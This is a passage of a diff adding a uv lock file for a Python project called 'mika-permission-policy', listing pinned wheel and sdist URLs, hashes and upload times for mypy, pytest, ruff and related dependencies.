+    { url = "https://files.pythonhosted.org/packages/7a/9e/2aa83758f22c278b837a1d8025898434ce2b8bff36678d5330ecaef56dff/librt-0.13.0-cp314-cp314t-macosx_11_0_arm64.whl", hash = "sha256:d4c8d9bd5abce34b2e75edb3bf37ab0f34e49b1f915a40ae8468eb7c85bc5b46", size = 161300, upload-time = "2026-07-08T12:25:56.585Z" },
+    { url = "https://files.pythonhosted.org/packages/bb/c0/86791e936553ca763d6b3c2fb4d31d596cd00e14fa631c283a40ba01559a/librt-0.13.0-cp314-cp314t-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:387e2f1d27e89bffe0d3f520f0da0662c973fd607ca16c1808f8a5085419485e", size = 582056, upload-time = "2026-07-08T12:25:58.144Z" },
+    { url = "https://files.pythonhosted.org/packages/a8/d3/a9ec15984a185e000c4d2a16ba28bd623124ad4c38a10974c7ff78e3a893/librt-0.13.0-cp314-cp314t-manylinux2014_i686.manylinux_2_17_i686.manylinux_2_28_i686.whl", hash = "sha256:4f6db193d2e5e0ed60359b9a5a682cd67205d0d3b1e459a867dd4b5c4e7eaa7a", size = 562758, upload-time = "2026-07-08T12:25:59.544Z" },
+    { url = "https://files.pythonhosted.org/packages/3c/af/dbe36b78b19c06a55097f99305e4ea9458e2273e6ae16a3cbecaad7ee978/librt-0.13.0-cp314-cp314t-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:0d38604854e8d22faadf683ec6c02bb0f886e2ba56ef981a1c36ee275f21ea22", size = 602095, upload-time = "2026-07-08T12:26:00.991Z" },
+    { url = "https://files.pythonhosted.org/packages/2a/a8/2966891b4dd2830f5203fbee92ac2c4947653a2390ba73dfa44244fad025/librt-0.13.0-cp314-cp314t-manylinux_2_34_riscv64.manylinux_2_39_riscv64.whl", hash = "sha256:371f7ce73026815dafd51c50ce38416e91428b28c4b2ec97cd39271164b0045c", size = 593452, upload-time = "2026-07-08T12:26:02.352Z" },
+    { url = "https://files.pythonhosted.org/packages/61/f5/4df8bfc8405ecf8c0d525b4d69636f694bdd8620b313ec8b76e54a5926cc/librt-0.13.0-cp314-cp314t-musllinux_1_2_aarch64.whl", hash = "sha256:3aaedf52171bee90860704c560bc798fe83b76247df47568e0197e9b13c735a0", size = 623729, upload-time = "2026-07-08T12:26:04.294Z" },
+    { url = "https://files.pythonhosted.org/packages/d6/13/9ac202dffc8db06f75d06c08c2f9f6ff054be67d21272dcc078fa1cc0c57/librt-0.13.0-cp314-cp314t-musllinux_1_2_i686.whl", hash = "sha256:96bad8725a4f196a798366c25ce075d1f7543a4ec045ffc13e6a7ec095cdab04", size = 617077, upload-time = "2026-07-08T12:26:05.845Z" },
+    { url = "https://files.pythonhosted.org/packages/6e/f0/ebe38610716aee5cb28efd95089bb90192096179802779381e1c5dcf239c/librt-0.13.0-cp314-cp314t-musllinux_1_2_riscv64.whl", hash = "sha256:6bf6a559ffe4a93bbea6cf31ddf01a7fd9ba342ef51f27beb178e318b74acd61", size = 599561, upload-time = "2026-07-08T12:26:07.21Z" },
+    { url = "https://files.pythonhosted.org/packages/4f/5c/c2e72e236fff7abc716d5b1753b8b8cd3ea85ac46fe17d2e7c51d4e1c723/librt-0.13.0-cp314-cp314t-musllinux_1_2_x86_64.whl", hash = "sha256:301067672387902c55f94b51d5022304b36c966ea9fe1f21caab99a9bef487c9", size = 645511, upload-time = "2026-07-08T12:26:08.562Z" },
+    { url = "https://files.pythonhosted.org/packages/0c/99/6203ce619dee940d6bfbe099ec3fe4be00a68e9d60f70abf906cf124fe66/librt-0.13.0-cp314-cp314t-win32.whl", hash = "sha256:5fdcf34f86de8fb66d7dc7589f96ba91c4aa46671200d400e6fd6f109a483f18", size = 104357, upload-time = "2026-07-08T12:26:09.828Z" },
+    { url = "https://files.pythonhosted.org/packages/52/dd/843b6314087c41657c7036d7914d8f294bdf9b580aa8513ea0588c8e9a3d/librt-0.13.0-cp314-cp314t-win_amd64.whl", hash = "sha256:260c33e92263fa629b4f6d3c51967a1c2158fe6c33237aaa3ebeac586b085259", size = 126998, upload-time = "2026-07-08T12:26:10.975Z" },
+    { url = "https://files.pythonhosted.org/packages/5f/5d/3dcec2884ba1b0806d1408612555c38dd5d68e90156b59f75f6e36435c3a/librt-0.13.0-cp314-cp314t-win_arm64.whl", hash = "sha256:2f281549a4c52ac7bb97997f14353f8bd0e53a34ca0dad1c905cfd0b4a58ae99", size = 110771, upload-time = "2026-07-08T12:26:12.303Z" },
+]
+
+[[package]]
+name = "mika-permission-policy"
+version = "0.1.0"
+source = { editable = "." }
+
+[package.optional-dependencies]
+dev = [
+    { name = "mypy" },
+    { name = "pytest" },
+    { name = "ruff" },
+]
+
+[package.metadata]
+requires-dist = [
+    { name = "mypy", marker = "extra == 'dev'", specifier = ">=2.1.0" },
+    { name = "pytest", marker = "extra == 'dev'", specifier = ">=9.1.1" },
+    { name = "ruff", marker = "extra == 'dev'", specifier = ">=0.15.20" },
+]
+provides-extras = ["dev"]
+
+[[package]]
+name = "mypy"
+version = "2.3.0"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+    { name = "ast-serialize" },
+    { name = "librt", marker = "platform_python_implementation != 'PyPy'" },
+    { name = "mypy-extensions" },
+    { name = "pathspec" },
+    { name = "typing-extensions" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/12/af/4e516a05d3ca2eb9283e9ec45b2c02225c1514dd6da49fd3c9eaa6639370/mypy-2.3.0.tar.gz", hash = "sha256:465965d41cd9a2726694e983e8ce7113259327bec798115d1e1dfa2a52fb666e", size = 3988104, upload-time = "2026-07-13T11:34:53.387Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/e6/b9/d75b3082b05f1b3028828aeb18e74ae5ab0a0936051bbf1f32f59f654747/mypy-2.3.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:3419d00717afbc5265b50dd14b1278f29ea4884dd398ab67873489ac093fd329", size = 14838725, upload-time = "2026-07-13T11:32:44.655Z" },
+    { url = "https://files.pythonhosted.org/packages/a9/50/79a65c6ea6e115bc73296038a4543b2d5c91f07912b918a2c616a2514bba/mypy-2.3.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:cfca8ee88544090f86b6dcce05ec55d66eb48a762412ac2507810ba4bd793b6f", size = 13911128, upload-time = "2026-07-13T11:32:02.021Z" },
+    { url = "https://files.pythonhosted.org/packages/90/48/e11ed7716c26953ca321f726e452e374dbf81a6f2b8b212ec02af29b6b8f/mypy-2.3.0-cp311-cp311-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:75cbb4b9ef04a0c84a957f07abc4504fbf64b8dcc145675101f2d3a78a4b1d6a", size = 14146742, upload-time = "2026-07-13T11:33:03.313Z" },
+    { url = "https://files.pythonhosted.org/packages/06/72/6807565b1c4861ef66f7fdd98b51c61556356eab80235717b46c53bb8627/mypy-2.3.0-cp311-cp311-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:982e3d53dd23d0a4cef67dd66791fdbede0cf38f9eb617bf47663554c51e1e36", size = 15081418, upload-time = "2026-07-13T11:31:13.899Z" },
+    { url = "https://files.pythonhosted.org/packages/00/80/1ea14c5d80e589e415973db3e47c78c2219a305b808b2b506395342c1d79/mypy-2.3.0-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:85c5385b93012ffa3b31479ab579aef5415f4f3a32c6cf1ae07a984d2a0ff461", size = 15328164, upload-time = "2026-07-13T11:31:35.723Z" },
+    { url = "https://files.pythonhosted.org/packages/37/28/8223157404a3d51920078459c37f80fbdc590e1d8ea049dc5ce48643022a/mypy-2.3.0-cp311-cp311-win_amd64.whl", hash = "sha256:13b1b16e2fa39f3b2e33fb1c468abc7a69369fa2e886b4b87b5afc81472325cd", size = 11136472, upload-time = "2026-07-13T11:27:37.018Z" },
+    { url = "https://files.pythonhosted.org/packages/6f/cc/ea27e5959c5f258585a756b252031f3b313583d81b5064b2bebc41d3706b/mypy-2.3.0-cp311-cp311-win_arm64.whl", hash = "sha256:b5cd2f027a972a4a5f2278a11fac9747f5f81a53a30b714d74950b6807e55568", size = 10135800, upload-time = "2026-07-13T11:30:08.92Z" },
+    { url = "https://files.pythonhosted.org/packages/dc/94/0e7e592619e2133596a47cdd642534b0456545c218430bd3b9d8fefdd1b1/mypy-2.3.0-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:2d53fc67b9d28a43c6199077f49fea0f05839e36cf6158500331c9549225e5a5", size = 15026523, upload-time = "2026-07-13T11:34:49.206Z" },
+    { url = "https://files.pythonhosted.org/packages/f6/d2/1e1731df090a857df2807177a4626863e5ac0f0256513c35780efe53986f/mypy-2.3.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:fbc00cee7bdbb9291979ddc9d08034a29dfcda4932628c9bbc28c1edd589df0c", size = 14032189, upload-time = "2026-07-13T11:33:57.168Z" },
+    { url = "https://files.pythonhosted.org/packages/44/95/cab921f4a806e171f34113e6181dd23c55358ccf6a80741269ef594a410e/mypy-2.3.0-cp312-cp312-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:04e617030eca5221909c8b7d8d7fd1c637948199aa2100b2ad9813feb07e1491", size = 14198696, upload-time = "2026-07-13T11:32:12.767Z" },
+    { url = "https://files.pythonhosted.org/packages/66/80/e6d008bb19fe446e3662d85e0e2717bf9f2d611a2164fb29d6e067dbf46c/mypy-2.3.0-cp312-cp312-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:56c184d2c20ca6b6378d58d1960270a767f41f5e44acbbd27f05effef4f4e1d7", size = 15286904, upload-time = "2026-07-13T11:34:27.594Z" },
+    { url = "https://files.pythonhosted.org/packages/db/83/94397c9293608a364aa03e8084fb34ede4ae976a260384b9b52929308135/mypy-2.3.0-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:3961a4a34b05f7c74b0f05aa51fbfe99a2d1e126038df40318d15c8f558b7ef3", size = 15528342, upload-time = "2026-07-13T11:34:07.819Z" },
+    { url = "https://files.pythonhosted.org/packages/cf/96/d8b37d819adec6cfccfb1fd3afc1735d94717ddeafb45536db9c6943e09b/mypy-2.3.0-cp312-cp312-win_amd64.whl", hash = "sha256:b1942b9314d4c784b8ea1dbab4972603290e5dd5630f06675f13aec97526bc4c", size = 11218346, upload-time = "2026-07-13T11:28:27.745Z" },
+    { url = "https://files.pythonhosted.org/packages/2b/cd/cd9f725b19b19e5b530a154cf9bcf9e94279c5d55b3c34fb42b3aa48ea1b/mypy-2.3.0-cp312-cp312-win_arm64.whl", hash = "sha256:be51653d7669d7d7955d613b8d0bb57d5b652eaf71a873ddf65ac87254dd2595", size = 10204525, upload-time = "2026-07-13T11:31:02.552Z" },
+    { url = "https://files.pythonhosted.org/packages/6e/ae/f7d056eb0294586a572d0d0d89580ec633c064db520f11d37d5a2fb833bd/mypy-2.3.0-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:91ad22a52ae2c7e621c2f67c94d5a17f66b3209a4cff5cf8a573579835c69e97", size = 14947298, upload-time = "2026-07-13T11:27:47.734Z" },
+    { url = "https://files.pythonhosted.org/packages/32/d5/db3e7af01e7844d21662c6ddc1f7825ec7cb4053f0391ac02faf3638396f/mypy-2.3.0-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:99ac767cc5d3b64c8d0ae226ead10c96694f94e4e7da1668642225dcd4e75aac", size = 13950768, upload-time = "2026-07-13T11:27:57.726Z" },
+    { url = "https://files.pythonhosted.org/packages/d9/fb/43c031f0190513d1ec248ed037eceb742ddd2a4d74bbf406658a28173837/mypy-2.3.0-cp313-cp313-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:de6d2c484742a4d7b0ed6d07b143375624d3b899c5749c7b3c947f56261f48a6", size = 14151586, upload-time = "2026-07-13T11:29:18.615Z" },
+    { url = "https://files.pythonhosted.org/packages/ec/c3/f8b2ffc60883084da91be51af58e88a7ffd4ff9795acb7d902ff88d31eb1/mypy-2.3.0-cp313-cp313-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:7da939dd335cfd2ad788bdfd081c9f4e47634ab995e5a45eb15fd1e5bc052f8b", size = 15227411, upload-time = "2026-07-13T11:30:29.904Z" },
+    { url = "https://files.pythonhosted.org/packages/83/2e/16b917fc7adcf03f1aadddfc93aab804ffb234b1ab09c0ffd6d92a5d34a2/mypy-2.3.0-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:7247eb2824f996722a949530183394921ca71deb9680052a338cf53cff7925c2", size = 15478790, upload-time = "2026-07-13T11:33:14.686Z" },
+    { url = "https://files.pythonhosted.org/packages/c0/88/aaa65a93c73d0cdae7e42f8adb302bf6885bb281302084f99d0290a35347/mypy-2.3.0-cp313-cp313-win_amd64.whl", hash = "sha256:75b0984bb3cbd76bb5c9291a8671f7ae66ca3b51c7584c358fc2e923259f0757", size = 11234919, upload-time = "2026-07-13T11:33:39.28Z" },
+    { url = "https://files.pythonhosted.org/packages/35/19/b40de63f1a80e63bc2d40f0679a6a8dbd34e95176c8122119bdf406aa552/mypy-2.3.0-cp313-cp313-win_arm64.whl", hash = "sha256:d78fcf900b59cb7e82cb7e3a235e31b462d9333d92285bd1e4952d355b8ffba1", size = 10201510, upload-time = "2026-07-13T11:31:52.619Z" },
+    { url = "https://files.pythonhosted.org/packages/a4/58/fa0ae047da911f540284009b4f44b96fe09d83c076d7c103e9d645f46303/mypy-2.3.0-cp314-cp314-macosx_10_15_x86_64.whl", hash = "sha256:ea317b060ce83e26050f8f9e4d7d6bf44ed7597c8ff9990bccffbb9d1d8522db", size = 14941909, upload-time = "2026-07-13T11:32:34.332Z" },
+    { url = "https://files.pythonhosted.org/packages/15/14/2ba1d61452d7c2a7fe12741e8d374e52b183476b07aa7f9e2a0d02b0720a/mypy-2.3.0-cp314-cp314-macosx_11_0_arm64.whl", hash = "sha256:094af99f92638aa92852326188b85a89e50f4a472f44827c03362228482f0762", size = 13967581, upload-time = "2026-07-13T11:30:00.587Z" },
+    { url = "https://files.pythonhosted.org/packages/ed/5a/483fb9e5ffbbb1a28dccc7b0a13d141b17ac769b6c9f488c0a0c63698962/mypy-2.3.0-cp314-cp314-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:de121747278144fc9ae7caa2e978cf5df12aebc82933182f5b3b86081a30baef", size = 14168807, upload-time = "2026-07-13T11:28:48.6Z" },
+    { url = "https://files.pythonhosted.org/packages/ae/77/70d7a10732063beb74ad713682cf871e88f5c5fa39bfc8beff8a524bf9cb/mypy-2.3.0-cp314-cp314-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:37fa4de896a84e2dc9200d91e614c22563b43d1a266789d4bbac7b22ebe6192b", size = 15200144, upload-time = "2026-07-13T11:31:25.283Z" },
+    { url = "https://files.pythonhosted.org/packages/56/72/766218ac783be4fdfcd699b90037b63017348a3e86fb2c1fbfb18302637d/mypy-2.3.0-cp314-cp314-musllinux_1_2_x86_64.whl", hash = "sha256:f1b3a98dfd21058bc759bb3337d5d1f61d0fdf9f3cf9c00f4291790fb5427bff", size = 15460389, upload-time = "2026-07-13T11:29:29.077Z" },
+    { url = "https://files.pythonhosted.org/packages/38/4e/8a9db7411ecb8ec0cb1fd05dba432f28bafffcd38b4e887714a4a0506689/mypy-2.3.0-cp314-cp314-pyemscripten_2026_0_wasm32.whl", hash = "sha256:944c665d984157cb96a679dfb7a4a81dd1d36b24b9c284b699514e6e626b82d4", size = 7753664, upload-time = "2026-07-13T11:29:08.147Z" },
+    { url = "https://files.pythonhosted.org/packages/65/4c/c3f8bfd6ed0e5e38b5a244403b27f821d433443df5a15a278417c10a3a3c/mypy-2.3.0-cp314-cp314-win_amd64.whl", hash = "sha256:4359424140d985192c778c1ce2c114a10c1ca58a381ed79cfa70d37df94b299f", size = 11417237, upload-time = "2026-07-13T11:33:47.467Z" },
+    { url = "https://files.pythonhosted.org/packages/3c/00/89a32eaf5ccf174bc4f90db0eaea5d70636c01b8d49f384bdab2e8834390/mypy-2.3.0-cp314-cp314-win_arm64.whl", hash = "sha256:3dd0bed92c4bdec57c42505b96416fb9e6a5aa7be84d2809bcd5f2ecec2860d7", size = 10389252, upload-time = "2026-07-13T11:31:43.81Z" },
+    { url = "https://files.pythonhosted.org/packages/31/56/104f93d69aa9f339b6b9d3b0a7faa699b8b466c942cf3ae86cc2a2ec0915/mypy-2.3.0-cp314-cp314t-macosx_10_15_x86_64.whl", hash = "sha256:691fdc37132b1ae628d834f672e74de83462d9fb4aff621835767fb43a8dd373", size = 16385495, upload-time = "2026-07-13T11:29:49.818Z" },
+    { url = "https://files.pythonhosted.org/packages/d2/03/f1d2123313f55efafdd27706960f43a771c62f1b68426c76043f3ab9ebf3/mypy-2.3.0-cp314-cp314t-macosx_11_0_arm64.whl", hash = "sha256:aec15d465d477558fd842757b487849007311cf3897849cdda0e3162ac0ac556", size = 15098155, upload-time = "2026-07-13T11:30:40.301Z" },
+    { url = "https://files.pythonhosted.org/packages/e5/5d/d5f9200399b445e81726c4f23becee33f233aee81c72680b1ef3a258b641/mypy-2.3.0-cp314-cp314t-manylinux2014_aarch64.manylinux_2_17_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:b352b7e49f5e6576009e8df730e1ff4f915cb565b851b396d2ffe2f5a6f5da88", size = 15514155, upload-time = "2026-07-13T11:34:38.569Z" },
+    { url = "https://files.pythonhosted.org/packages/cd/ce/69977c555f08faa3190cfde44189b89dbd56861b1ab97aa18fc5f3a2e4a3/mypy-2.3.0-cp314-cp314t-manylinux2014_x86_64.manylinux_2_17_x86_64.manylinux_2_28_x86_64.whl", hash = "sha256:1c6c6bf687b17f90dbfcad95b960d32eaa0154c00da45f03ab50bf8952e047fe", size = 16766351, upload-time = "2026-07-13T11:33:29.195Z" },
+    { url = "https://files.pythonhosted.org/packages/bc/92/6648b6caa3ab9e00f9ac0c2a78307805f873dd48139b24a6f6f7c3667bbf/mypy-2.3.0-cp314-cp314t-musllinux_1_2_x86_64.whl", hash = "sha256:f4ed18f111bfe2d599bca7468e7f9251042c1c2118f762c8de2766a56d773c60", size = 17043490, upload-time = "2026-07-13T11:30:53.927Z" },
+    { url = "https://files.pythonhosted.org/packages/7c/ab/0dc91d80f3f016634c68d451f294a97320fe903a9b6f90b9e57b3f7f1717/mypy-2.3.0-cp314-cp314t-win_amd64.whl", hash = "sha256:0b025a93cffb9781d231f232be07a17912f35f10a313c24f301c81e842870654", size = 12146869, upload-time = "2026-07-13T11:29:38.874Z" },
+    { url = "https://files.pythonhosted.org/packages/85/b5/4c964d02634ba81f4d1c84838e5c5b18ab06d13ed568960f5d6318495ccc/mypy-2.3.0-cp314-cp314t-win_arm64.whl", hash = "sha256:adebc76aab4f3495a88b41d48aa4aff0c03f2822501da76625afcca5975f19e5", size = 10965113, upload-time = "2026-07-13T11:28:07.056Z" },
+    { url = "https://files.pythonhosted.org/packages/2c/fa/fdc54fe583ba3cafbcedfb70eeeaf03849f75b1827a07096c7bd996f582d/mypy-2.3.0-py3-none-any.whl", hash = "sha256:6b1cdb579446b60432432b2b2403a6201b4b475a004d7f488511c9ba177c9e88", size = 2753292, upload-time = "2026-07-13T11:33:18.48Z" },
+]
+
+[[package]]
+name = "mypy-extensions"
+version = "1.1.0"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/a2/6e/371856a3fb9d31ca8dac321cda606860fa4548858c0cc45d9d1d4ca2628b/mypy_extensions-1.1.0.tar.gz", hash = "sha256:52e68efc3284861e772bbcd66823fde5ae21fd2fdb51c62a211403730b916558", size = 6343, upload-time = "2025-04-22T14:54:24.164Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/79/7b/2c79738432f5c924bef5071f933bcc9efd0473bac3b4aa584a6f7c1c8df8/mypy_extensions-1.1.0-py3-none-any.whl", hash = "sha256:1be4cccdb0f2482337c4743e60421de3a356cd97508abadd57d47403e94f5505", size = 4963, upload-time = "2025-04-22T14:54:22.983Z" },
+]
+
+[[package]]
+name = "packaging"
+version = "26.2"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/d7/f1/e7a6dd94a8d4a5626c03e4e99c87f241ba9e350cd9e6d75123f992427270/packaging-26.2.tar.gz", hash = "sha256:ff452ff5a3e828ce110190feff1178bb1f2ea2281fa2075aadb987c2fb221661", size = 228134, upload-time = "2026-04-24T20:15:23.917Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/df/b2/87e62e8c3e2f4b32e5fe99e0b86d576da1312593b39f47d8ceef365e95ed/packaging-26.2-py3-none-any.whl", hash = "sha256:5fc45236b9446107ff2415ce77c807cee2862cb6fac22b8a73826d0693b0980e", size = 100195, upload-time = "2026-04-24T20:15:22.081Z" },
+]
+
+[[package]]
+name = "pathspec"
+version = "1.1.1"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/5a/82/42f767fc1c1143d6fd36efb827202a2d997a375e160a71eb2888a925aac1/pathspec-1.1.1.tar.gz", hash = "sha256:17db5ecd524104a120e173814c90367a96a98d07c45b2e10c2f3919fff91bf5a", size = 135180, upload-time = "2026-04-27T01:46:08.907Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/f1/d9/7fb5aa316bc299258e68c73ba3bddbc499654a07f151cba08f6153988714/pathspec-1.1.1-py3-none-any.whl", hash = "sha256:a00ce642f577bf7f473932318056212bc4f8bfdf53128c78bbd5af0b9b20b189", size = 57328, upload-time = "2026-04-27T01:46:07.06Z" },
+]
+
+[[package]]
+name = "pluggy"
+version = "1.6.0"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/f9/e2/3e91f31a7d2b083fe6ef3fa267035b518369d9511ffab804f839851d2779/pluggy-1.6.0.tar.gz", hash = "sha256:7dcc130b76258d33b90f61b658791dede3486c3e6bfb003ee5c9bfb396dd22f3", size = 69412, upload-time = "2025-05-15T12:30:07.975Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/54/20/4d324d65cc6d9205fabedc306948156824eb9f0ee1633355a8f7ec5c66bf/pluggy-1.6.0-py3-none-any.whl", hash = "sha256:e920276dd6813095e9377c0bc5566d94c932c33b27a3e3945d8389c374dd4746", size = 20538, upload-time = "2025-05-15T12:30:06.134Z" },
+]
+
+[[package]]
+name = "pygments"
+version = "2.20.0"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/c3/b2/bc9c9196916376152d655522fdcebac55e66de6603a76a02bca1b6414f6c/pygments-2.20.0.tar.gz", hash = "sha256:6757cd03768053ff99f3039c1a36d6c0aa0b263438fcab17520b30a303a82b5f", size = 4955991, upload-time = "2026-03-29T13:29:33.898Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/f4/7e/a72dd26f3b0f4f2bf1dd8923c85f7ceb43172af56d63c7383eb62b332364/pygments-2.20.0-py3-none-any.whl", hash = "sha256:81a9e26dd42fd28a23a2d169d86d7ac03b46e2f8b59ed4698fb4785f946d0176", size = 1231151, upload-time = "2026-03-29T13:29:30.038Z" },
+]
+
+[[package]]
+name = "pytest"
+version = "9.1.1"
+source = { registry = "https://pypi.org/simple" }
+dependencies = [
+    { name = "colorama", marker = "sys_platform == 'win32'" },
+    { name = "iniconfig" },
+    { name = "packaging" },
+    { name = "pluggy" },
+    { name = "pygments" },
+]
+sdist = { url = "https://files.pythonhosted.org/packages/e4/47/b9efed96c114afcfa3c9d3fe98a76a1d14c74a9e266d397cf6eb64be5e01/pytest-9.1.1.tar.gz", hash = "sha256:1088fbde8f2b49d95a549a195707afa7a76a3ce9bcadc26b6d71f0ffda5fe313", size = 1636369, upload-time = "2026-06-19T10:58:32.857Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/24/25/1de2678b631f5a49215c6c96fff41ba892b0a34df68d6d80292b1b48aa7f/pytest-9.1.1-py3-none-any.whl", hash = "sha256:37a86b45efb9a47a61a36449063e8e18d0cab3161329fc099eb21783169c4f0c", size = 386536, upload-time = "2026-06-19T10:58:31.347Z" },
+]
+
+[[package]]
+name = "ruff"
+version = "0.15.22"
+source = { registry = "https://pypi.org/simple" }
+sdist = { url = "https://files.pythonhosted.org/packages/3a/06/ae069393fc66e8ff33036d4b368003833bf6e88ccf182e17e7a2f1c754fd/ruff-0.15.22.tar.gz", hash = "sha256:3f15175b1fb580126f58285a5dae6b2ea89000136d980c64499211f116b54809", size = 4785063, upload-time = "2026-07-16T15:14:13.244Z" }
+wheels = [
+    { url = "https://files.pythonhosted.org/packages/23/18/ee54b7ae1e121be7a28ea6da4b67564ebb0530e183a54415ab7e3bcd2c4e/ruff-0.15.22-py3-none-linux_armv6l.whl", hash = "sha256:44423e73493737f5e7c5b41d475483898ff37afcdae38bc3da5085e29af1c2d8", size = 10781258, upload-time = "2026-07-16T15:13:19.452Z" },
+    { url = "https://files.pythonhosted.org/packages/2f/d2/2520cb14761ddbeaf57642a76942fc36adcbdbe53b4532241995f6fc485c/ruff-0.15.22-py3-none-macosx_10_12_x86_64.whl", hash = "sha256:b82c6482946e9eda7ff2e091d25b8bad3f718684e1916d41bd56873cee05b697", size = 10999477, upload-time = "2026-07-16T15:13:23.318Z" },
+    { url = "https://files.pythonhosted.org/packages/c9/10/74e53572aa758dfaa678c2a2646b5c5515d884b7ca56be4d2ce03ca4b560/ruff-0.15.22-py3-none-macosx_11_0_arm64.whl", hash = "sha256:11c1c715af53a09f714e011106bffc419751ec8232fcb5da42173284ea3fec6f", size = 10466716, upload-time = "2026-07-16T15:13:26.162Z" },
+    { url = "https://files.pythonhosted.org/packages/1e/cc/44eaaf0844e028182f2d0a8f2190d0f359159aed0a9e5ab861d892f1ae2a/ruff-0.15.22-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:742a29cf29bddb7c8327895d6a10e0e6c5b38a96dd407af9b5d0857f809c0576", size = 10892644, upload-time = "2026-07-16T15:13:29.229Z" },
+    { url = "https://files.pythonhosted.org/packages/9f/21/8edf559014d2b0f82beea19cfb713993ad802ccda16868769979c6090a84/ruff-0.15.22-py3-none-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:72af58b951b0ae395935ae79763dc349bc0eb706319d28f7a33ad2cfb3cfc178", size = 10576719, upload-time = "2026-07-16T15:13:32.35Z" },
+    { url = "https://files.pythonhosted.org/packages/bf/1e/3a13abd392a3b50b62e5938a831f9ab6e588358cacad5c18545b716d2182/ruff-0.15.22-py3-none-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:62d425005c1835eb24e2ee4161cb90e8db263415f4a71c8c72c33abaa6c0c224", size = 11376494, upload-time = "2026-07-16T15:13:35.958Z" },
+    { url = "https://files.pythonhosted.org/packages/bf/3e/422d3d95bcf04dd78e1aeac22184d4f9a8fb2c01865d39d44618484a0317/ruff-0.15.22-py3-none-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:e8b9b3f8779a4f08c969defc3c8c35abffaa757e601ed5ae66d6d1db6519969a", size = 12208370, upload-time = "2026-07-16T15:13:39.185Z" },
+    { url = "https://files.pythonhosted.org/packages/1e/91/5d065a0e0a02bf4813f5119ad278462eed081d2b832eb7c021ade0ec9e65/ruff-0.15.22-py3-none-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1e0dd1b2e4d3d585f897a0d137cbf4eaf6223bef4e8ce34d6bb12556c5f9249e", size = 11581098, upload-time = "2026-07-16T15:13:42.132Z" },
+    { url = "https://files.pythonhosted.org/packages/f6/f9/a0d4871d12fae702eb1f41b686caf05f1f8b124dc6db6f784f53d74918fa/ruff-0.15.22-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:365523eb91d9224e1bcb03b022fbf0facb8f9e23792a2c53d9d4b3924bdbdebb", size = 11399422, upload-time = "2026-07-16T15:13:45.2Z" },
+    { url = "https://files.pythonhosted.org/packages/18/80/c843a5176cddbceb0b7e8dd41cf9993490796c1c469348d384f5a5c13c56/ruff-0.15.22-py3-none-manylinux_2_31_riscv64.whl", hash = "sha256:fabfd168afdf29fee5be98b831efa9683c94d7c5a3b58b9ce5a2e38444589a74", size = 11381683, upload-time = "2026-07-16T15:13:48.46Z" },
+    { url = "https://files.pythonhosted.org/packages/d4/00/8485de0ae92239438a36cfc51350db9b9e85c9ebdfaea91b18e422706662/ruff-0.15.22-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:225dbf095a87f1d9f90f5fd7924d2613ee452a75a4308c63a8f50f761787aa7c", size = 10850295, upload-time = "2026-07-16T15:13:51.655Z" },
+    { url = "https://files.pythonhosted.org/packages/fa/91/24977ec2ec72eaf15e4394ace2959fdff2dd1e14f03e005e838023407169/ruff-0.15.22-py3-none-musllinux_1_2_armv7l.whl", hash = "sha256:1877d63b9d24ed278744f1523fd11b85540566d54641f97c566d7d9dc5ca5296", size = 10579640, upload-time = "2026-07-16T15:13:54.79Z" },
